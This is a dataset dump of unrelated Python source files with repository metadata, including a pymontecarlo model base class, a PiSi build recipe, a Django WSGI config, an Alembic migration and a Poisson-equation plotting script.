| 2020-12-02T18:01:42.525323 | 2017-05-19T16:44:30 | 2017-05-19T16:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 649 |
py
|
"""
Base models.
"""
# Standard library modules.
import abc
import enum
# Third party modules.
# Local modules.
from pymontecarlo.options.base import Option
# Globals and constants variables.
class ModelMeta(enum.EnumMeta, abc.ABCMeta):
    # Combined metaclass so Model can subclass both enum.Enum (metaclass
    # EnumMeta) and the abstract Option base (metaclass ABCMeta) without a
    # metaclass conflict.
    pass
class Model(Option, enum.Enum, metaclass=ModelMeta):
    """Base class for model options: an Enum whose members carry a
    human-readable full name and an optional literature reference."""

    def __init__(self, fullname, reference=''):
        # Enum member payload: each member's value is (fullname[, reference]).
        self.fullname = fullname
        self.reference = reference

    def __eq__(self, other):
        # NOTE: Must be implemented from Option,
        # but should only use the identity-based equality from Enum.
        return enum.Enum.__eq__(self, other)

    def __str__(self):
        return self.fullname
|
[
"[email protected]"
] | |
bbb0e5789cc95e133b10dc78292d1330aa319f50
|
09d349155446f2f32519cfc7deb7f79b1138a158
|
/kraft/actions.py
|
d7a5fba1e5bcf34353359243e9c51f253c87c7e3
|
[] |
no_license
|
marcin-/pardususer.de
|
632d7fb4c5a9252dbcf82711a5da126523d3b8e8
|
1d4bb1d1f9da113cf2b8cbcc6b544ec9b9616862
|
refs/heads/master
| 2016-09-05T23:22:38.726769 | 2012-10-08T20:40:39 | 2012-10-08T20:40:39 | 6,114,809 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 810 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pisi.actionsapi import cmaketools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
    """Configure the package with CMake, out-of-source, with release flags."""
    shelltools.makedirs("build")
    shelltools.cd("build")
    # sourceDir=".." points cmake back at the unpacked sources.
    cmaketools.configure("-DCMAKE_INSTALL_PREFIX=/usr \
                          -DCMAKE_BUILD_TYPE=Release \
                          -DCMAKE_CXX_FLAGS_RELEASE:STRING='-DNDEBUG -DQT_NO_DEBUG' \
                          -DCMAKE_C_FLAGS_RELEASE:STRING='-DNDEBUG'", sourceDir="..")
def build():
    """Compile inside the build/ directory created by setup()."""
    shelltools.cd("build")
    cmaketools.make()
def install():
    """Install the compiled artifacts and package the documentation files."""
    shelltools.cd("build")
    cmaketools.install()
    # dodoc paths are relative to the source root, so step back out of build/.
    shelltools.cd("..")
    pisitools.dodoc("TODO", "Changes.txt", "INSTALL", "README", "COPYING", "Releasenotes.txt", "AUTHORS")
|
[
"[email protected]"
] | |
5005cb8e54066070f254014fede0db6ecb90ed09
|
b6df7cda5c23cda304fcc0af1450ac3c27a224c1
|
/nlp/preprocessing.py
|
441402923997d2e7d7041d50ca10938068282e69
|
[] |
no_license
|
vieira-rafael/py-search
|
88ee167fa1949414cc4f3c98d33f8ecec1ce756d
|
b8c6dccc58d72af35e4d4631f21178296f610b8a
|
refs/heads/master
| 2021-01-21T04:59:36.220510 | 2016-06-20T01:45:34 | 2016-06-20T01:45:34 | 54,433,313 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
class PreProcessing:
    """Holds the stop-word list used to filter tokens during preprocessing."""

    def __init__(self):
        # BUG FIX: the original bound this list to a local variable, so it was
        # discarded immediately and instances exposed no stop words at all;
        # store it on the instance instead.
        self.stopwords = ["and", "del", "from", "not", "while", "as", "elif", "global", "or", "with", "assert", "else", "if", "pass", "yield", "break", "except", "import", "print", "class", "exec", "in", "raise", "continue", "finally", "is", "return", "def", "for", "lambda", "try"]
|
[
"[email protected]"
] | |
d425739853edd3970661241960467b810be5829e
|
ab5731ae6e190a9b44b1cddbd11af89277302de9
|
/read_json/data_json.py
|
686c168a2ed574d935bcf65b3bbd202919f755d4
|
[] |
no_license
|
MachineLP/py_workSpace
|
e532781aab51c54a87602c387acd3199f9a75140
|
7937f3706e8d2d8a0e25ba0648bee6d1fcb27234
|
refs/heads/master
| 2021-08-29T02:56:02.415509 | 2021-08-23T10:38:59 | 2021-08-23T10:38:59 | 117,516,956 | 22 | 18 | null | null | null | null |
UTF-8
|
Python
| false | false | 607 |
py
|
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
"""
import sys
import numpy as np
import json as js
class load_image_from_json(object):
    """Loads annotation records from a JSON file."""

    def __init__(self, json_file):
        # Path of the JSON file to read.
        self.json_file = json_file

    def __del__(self):
        pass

    def js_load(self):
        """Parse the JSON file and return the decoded data.

        FIX: the original opened the file without closing it; the context
        manager releases the handle as soon as parsing finishes.
        """
        with open(self.json_file, 'r') as f:
            return js.load(f)
if __name__ == "__main__":
all_data = load_image_from_json('0(6015).json').js_load()
for data in all_data:
print (data['image_id'])
print (data['keypoint']['human1'])
|
[
"[email protected]"
] | |
b35422cbf3d8501bfd9d006f2035134b3d022010
|
327a8fe2743bde7f49b19914e4d62091cb7c79d6
|
/upload/wsgi.py
|
d97d7643e5921ed05ee7ec9f48320185ec321262
|
[
"MIT"
] |
permissive
|
danrneal/raft-drf-exercise
|
3de78d115e02a3739911feb30e1b96f482b873e0
|
f62d2f05cd085f7a8d9b89f4ecee2c76feb4b47e
|
refs/heads/main
| 2023-08-03T17:04:14.583022 | 2021-09-22T19:53:08 | 2021-09-22T19:53:08 | 312,690,985 | 0 | 0 |
MIT
| 2021-09-22T19:53:09 | 2020-11-13T21:47:48 |
Python
|
UTF-8
|
Python
| false | false | 389 |
py
|
"""
WSGI config for upload project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Fall back to the project's settings module unless the environment
# already names one.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'upload.settings')

# Module-level WSGI callable that application servers import.
application = get_wsgi_application()
|
[
"[email protected]"
] | |
d87050e9f0620d49c9b7e96014c4fa531605ba4a
|
64ab5b65afdf8d950c4b56ad2259133b95fc2fec
|
/zeus/migrations/e373a7bffa18_unique_build_failures.py
|
c118ddf8f86aee0ea630a9b38be70d3beae61969
|
[
"Apache-2.0"
] |
permissive
|
getsentry/zeus
|
3e88895443b23278fdb4c25121422ee214630512
|
6d4a490c19ebe406b551641a022ca08f26c21fcb
|
refs/heads/master
| 2023-09-01T14:20:11.396306 | 2021-04-30T17:08:33 | 2021-04-30T17:08:33 | 96,131,433 | 222 | 27 |
Apache-2.0
| 2022-06-01T03:17:16 | 2017-07-03T16:39:35 |
Python
|
UTF-8
|
Python
| false | false | 897 |
py
|
"""unique_build_failures
Revision ID: e373a7bffa18
Revises: 54bbb66a65a6
Create Date: 2020-03-13 09:25:38.492704
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "e373a7bffa18"
down_revision = "54bbb66a65a6"
branch_labels = ()
depends_on = None
def upgrade():
    """Deduplicate failurereason rows, then enforce uniqueness going forward."""
    # first we clean up duplicate rows: keep the lowest id per
    # (build_id, reason) pair so the unique index below can be created.
    connection = op.get_bind()
    connection.execute(
        """
        DELETE FROM failurereason a
        USING failurereason b
        WHERE a.id > b.id
        AND a.reason = b.reason
        AND a.build_id = b.build_id
    """
    )
    # Partial unique index: uniqueness applies only to build-level failures
    # (rows where job_id IS NULL) — PostgreSQL-specific.
    op.create_index(
        "unq_failurereason_buildonly",
        "failurereason",
        ["build_id", "reason"],
        unique=True,
        postgresql_where=sa.text("job_id IS NULL"),
    )
def downgrade():
    # Drop the partial unique index; rows deleted by upgrade() are not restored.
    op.drop_index("unq_failurereason_buildonly", table_name="failurereason")
|
[
"[email protected]"
] | |
a1ebf96d93a3e1ae78d6189b078630bb4fcf8d52
|
7f90f49237b30e404161b4670233d023efb7b43b
|
/第二章 python核心/HX02_linux系统编程/01进程/test/jc10_子进程多种方式小结.py
|
a42c62f02979b3b07ae8548d92ebb3d3b86fd1b6
|
[] |
no_license
|
FangyangJz/Black_Horse_Python_Code
|
c5e93415109699cc42ffeae683f422da80176350
|
34f6c929484de7e223a4bcd020bc241bb7201a3d
|
refs/heads/master
| 2020-03-23T01:52:42.069393 | 2018-07-14T12:05:12 | 2018-07-14T12:05:12 | 140,942,688 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 451 |
py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# author: Fangyang time:2018/3/31
# (1) fork, 只用于linux (不推荐)
# NOTE(review): illustrative pseudocode summarizing three ways to spawn a
# child process — the if/else bodies below contain only comments, so this
# snippet is not runnable as-is.
# (1) fork, Linux only (not recommended)
ret = os.fork()
if ret == 0:
    # child process
else:
    # parent process
# (2) Process(target=xxx); there is also the subclassing form: class Xxx(Process):
p1 = Process(target=func)
p1.start()
# the main process can do some work of its own too
# (3) pool (recommended)
pool = Pool(3)
pool.apply_async(xxxx)
# the main process usually just waits and does no work; the real tasks run
# in the child processes
|
[
"[email protected]"
] | |
ac4b87c2ef8d46c4149984f849a04f5e20b3fc0e
|
600df3590cce1fe49b9a96e9ca5b5242884a2a70
|
/third_party/catapult/telemetry/telemetry/timeline/sample.py
|
806f60fafa2635a581485698ceee0eed38121471
|
[
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
metux/chromium-suckless
|
efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a
|
72a05af97787001756bae2511b7985e61498c965
|
refs/heads/orig
| 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 |
BSD-3-Clause
| 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null |
UTF-8
|
Python
| false | false | 713 |
py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.event as timeline_event
class Sample(timeline_event.TimelineEvent):
    """A Sample represents a sample taken at an instant in time
    plus parameters associated with that sample.

    NOTE: The Sample class implements the same interface as
    Slice. These must be kept in sync.

    All time units are stored in milliseconds.
    """
    def __init__(self, parent_thread, category, name, timestamp, args=None):
        # Samples are instantaneous, so the event duration is always 0.
        super(Sample, self).__init__(
            category, name, timestamp, 0, args=args)
        # Thread the sample was taken on; kept here, not on the base event.
        self.parent_thread = parent_thread
|
[
"[email protected]"
] | |
a0d9c35a415b9dd7d28d35a0995ae5dc81209c6a
|
4dd1d8fa59e20061e2c12e540fc52b1b305e575b
|
/source/sims/s89/plt-exact-sol.py
|
0d82396776954a630e3f77a1be11e7c2991767ef
|
[
"MIT"
] |
permissive
|
ammarhakim/ammar-simjournal
|
f63521906a97d55ab290a5960d94758139944c89
|
5019f4723e20db80a20db6f2bd454c2fd3241412
|
refs/heads/master
| 2023-06-08T08:18:11.722779 | 2023-06-02T15:06:43 | 2023-06-02T15:06:43 | 204,050,516 | 3 | 3 | null | 2022-02-01T16:53:13 | 2019-08-23T18:28:44 |
Lua
|
UTF-8
|
Python
| false | false | 765 |
py
|
import pylab
import tables
import math
import numpy
def exactSol(a, b, X):
    """Analytic solution of the 1D Poisson problem with source
    1 + a*x^2 + b*x^4 and zero boundary values at x=0 and x=1.

    Works elementwise when X is a numpy array.
    """
    # Linear coefficients chosen so the solution vanishes at both ends.
    slope = -(1/2.0 + a/12.0 + b/30.0)
    offset = 0.0
    poly = X**2/2 + a*X**4/12 + b*X**6/30
    return poly + slope*X + offset
fh = tables.openFile("s89-poisson-o3-1d_phi.h5")
q = fh.root.StructGridField
nx, nc = q.shape
Xf = pylab.linspace(0, 1, nx)
qe = q[:,0]
dx = Xf[1]-Xf[0]
Xm = pylab.linspace(0.5*dx, 1-0.5*dx, nx-1)
qm = q[:-1,1]
a = 2.0
b = -12.0
Xhr = pylab.linspace(0, 1, 101)
fhr = exactSol(a, b, Xhr)
# make plot comparing exact to numerical solution
pylab.plot(Xhr, fhr, '-r', Xf, qe, 'ok', Xm, qm, 'ok')
# compute error
fex_e = exactSol(a, b, Xf)
fex_m = exactSol(a, b, Xm)
error = (numpy.abs(fex_e-qe).sum() + numpy.abs(fex_m-qm).sum())/(nx+nx-1);
print "%g %g" % (dx, error)
pylab.show()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.